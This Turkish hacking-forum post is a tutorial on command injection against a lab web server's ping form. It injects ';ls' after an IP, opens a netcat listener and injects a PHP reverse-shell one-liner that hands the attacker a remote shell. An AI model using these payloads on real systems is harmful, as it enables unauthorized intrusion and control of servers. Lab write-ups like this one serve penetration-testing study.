Command Execution (Kod Yürütme Açığı )

AHMET SENCER

Katılımcı Üye
19 Şub 2021
732
6
409
TANRI DAĞI
Kod Yürütme Açığı
Merhaba Arkadaşlar bugün sizlere command execution yani kod yürütme açığından bahsedeceğim öncelikle bu açık manuel olarak nasıl bulunur, nerelerde bulunur, böyle bir açık hangi sebeplerden ortaya çıkar bunlardan bahsedelim.

KOD YÜRÜTME AÇIĞI NERELERDE BULUNUR:


Kod Yürütme Açığı genellikle web sitelerde verilen forum bölümlerinde bulunur. Örnek olması için metasploit table üzerinden örnekli olarak anlatacağım.

i4n0iao.png


Yukarıdaki Resimdede gördüğünüz gibi bir forum verilmiş. Bu forum bize ücretsiz olarak ping servisi sunduğunu söylüyor. kalimizin ıp sini yazalım bakalım çalışıyormu.

p7770oj.png


Resimdede Gördüğünüz gibi çalışıyor. Peki bu açık bunun neresinde diye soruyosunuz. Kod yürütme açığı bizden istenilen şeyin yanında kod çalıştırdığımızda bir hata almıyorsak kod yürütme açığı var demektir.
Şimdi ıp mizin yanında herhangi bir kod çalıştırarak bakalım kod yürütme açığı bulunuyormu.

5ew1dsj.png


Ip min yanına
;
koyarak ve
ls
komutunu çalıştırdım ve hem ıp me ping attı hemde ls komutuna cevap verdi siyah kalemle yuvarlağa aldığım yere bakın şuanda sunucunun bulunduğu dizinin içerisindeki bazı dizin ve dosyaları görebiliyorum. Buda Bize burada command execution açığının olduğunu gösteriyor.
Peki biz bu açık sayesinde sunucuya nasıl bağlana biliriz ?

Kod Yürütme Açığı İle Sunucuya Bağlanma
Arkadaşlar bu açığın bulunduğu web sunucularına sızmak için reverse shell command yani ters bağlantı kodlarını kullanıcaz bu sayee sunucuyu kendimize bağlamış olucaz ve içerisinde rahatlıkla geze bilicez.

rgik2w4.png


Googlede Reverse shell command diye bir arama yaparsak önümüze birçok sonuç çıkıcaktır pentestmonkey diye bir web site karşımıza çıkacaktır. Bu Web siteye girelim. yukarıdaki resimde gördüğünüz gibi farklı farklı dillerde reverse shell komutları yazılmış bunlardan herhangi birini kullana biliriz hepsi çalışmaya bilir deneme yanılma yöntemmi ile deneyerek hangisi çalışıyor bula biliriz. Ben PHP ile yazılmış olanı kullanıcam.

Şimdi sunucuyu kendimize bağlayacağımız için dinlemeye alıcaz bunu msfconsol ve netcad den yapabilirz ben netcad den yapıcam
nc -vv -l -p 5050

ben 5050 portundan dinlemeye alıcam sizler istediğiniz porttan dinlemeye alabilirsiniz.

kln5p46.png


10.0.2.6; php -r '$sock=fsockopen("10.0.2.6",5050);exec("/bin/sh -i <&3 >&3 2>&3");'

PHP yi kullanacağım için IP mi yazdıktan sonra ; işaretini kullanıp reverse shell kodunu yapıştırıyorum ( IP ve Portu Kendini<e göre değiştirmelisiniz ) Entere basıyorum bakalım sunucuya bağlandıkmı.
n1j8w8z.png


Gördüğünüz gibi sunucuya bağlandık. Sunucunun içersinde istediğimiz şekilde gezebiliyoruz.

otct4dj.png


Evet arkadaşlar kod yürütme açığının ne olduğunu nasıl bulunduğunu ve nasıl sızıldığını öğrendik. umarım faydalı olmuştur.
İYİ FORUMLAR :)

NOT: Bazı Arkadaşlarımız yazılı eğtimleri daha iyi anlıyo bazı arkadaşlarımız videolu bu nedenle yukarıda anlattıklarımla ilgili 10 dk lık bir video çektim videolu anlatımdan daha iyi anlayan arkadaşlarımız izleye bilirler

VİDEO LİNKİ :
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.